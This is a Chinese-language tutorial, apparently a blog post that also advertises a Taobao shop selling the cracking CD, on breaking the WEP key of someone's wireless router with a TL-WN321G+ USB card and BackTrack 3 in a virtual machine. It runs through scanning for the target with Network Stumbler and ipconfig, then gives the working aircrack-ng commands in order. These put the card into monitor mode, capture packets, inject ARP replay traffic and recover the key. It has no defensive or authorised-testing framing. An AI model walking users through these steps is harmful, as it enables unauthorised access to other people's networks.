本文方法不限于TL-WN321G+這塊網(wǎng)卡。其他網(wǎng)卡即可。之所以,使用這塊網(wǎng)卡,是淘寶此卡出貨量較大。且網(wǎng)上用虛擬機(jī)破解此網(wǎng)卡詳細(xì)教程較少。
pdf版本這里查看
http://www.docin.com/p-3424406.html
破解需要的光盤這里購買
http://zhangzhm.taobao.com/shop/xshop/wui_page-cat-33755369-122391710-QmFja1RyYWNr.htm?checkedRange=true
本文描述的方法是破解的整個(gè)過程。
其他高級的攻擊技術(shù)(無客戶端,只有ap。等情況),另作文章描述。
破解以前,需要獲得如下信息:
本機(jī)IP地址
無線路由器MAC地址
無線路由器名稱
無線網(wǎng)絡(luò)頻道號
1. 首先使用nerwork stumbler獲得以上信息。
自己網(wǎng)卡的信息通過ipconfig/all命令行查詢
1. 是無線路由的mac
2.是無線路由的名字
3.是無限網(wǎng)絡(luò)用到的頻道號
需要的信息我們基本上都有了。下載BT3,安裝虛擬機(jī)。
用虛擬機(jī)啟動(dòng)下載的iso,使用usb網(wǎng)卡,直接在虛擬機(jī)上會認(rèn)不出來。
只要將usb拔下來,重新插上即可。虛擬機(jī)一般認(rèn)出來是rausb0
啟動(dòng)虛擬機(jī),開三個(gè)不同的shell,運(yùn)行一下三個(gè)命令,等待密碼出現(xiàn)即可,剩下的就是等待
64位加密需要3萬加密數(shù)據(jù),128位需要10萬數(shù)據(jù)即可。
第一個(gè)shell:數(shù)據(jù)抓包
1. 先ifocnfig -a查看自己的網(wǎng)卡名稱
airmon-ng start rausb0 1
rausb0是自己的網(wǎng)卡名稱
1是頻道號
airodump-ng -c 1 --bssid 00:14:78:A2:BB:5C -w outputs rausb0
--bssid 無線路由MAC地址
鍵入此命令后,可以查看到1頻道中數(shù)據(jù)量,上面的data一直在走我們說的3萬數(shù)據(jù)包和10萬數(shù)據(jù)包就是指這個(gè)值。
第二個(gè)shell :產(chǎn)生數(shù)據(jù)
aireplay-ng -3 -b 00:14:78:A2:BB:5C -h 00:1d:0f:06:02:7f rausb0
-h 本機(jī)MAC地址
-b 無線路由MAC地址
第三個(gè)shell:破解
aircrack-ng -z -b 00:14:78:A2:BB:5C outputs.cap
然后等待密碼出現(xiàn)即可。當(dāng)數(shù)據(jù)不足時(shí),他會等待數(shù)據(jù)接收夠后,繼續(xù)破解。無需干預(yù),只要等最后的密碼出現(xiàn)就好.